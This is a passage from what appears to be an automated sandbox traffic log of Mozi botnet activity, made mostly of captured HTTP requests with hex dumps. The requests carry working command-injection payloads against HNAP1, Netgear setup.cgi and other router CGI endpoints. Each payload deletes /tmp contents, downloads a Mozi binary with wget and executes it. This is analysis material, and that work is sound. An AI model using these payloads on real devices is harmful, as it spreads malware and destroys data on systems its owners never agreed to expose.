41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 168.176.61.231:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 104.101.170.129:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
Source: global traffic | HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0 |
Source: global traffic | HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 168.176.61.231:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 2.178.219.63:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 52.4.18.169:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0 |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 54.84.181.34:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 168.176.61.231:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 46.254.184.147:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping 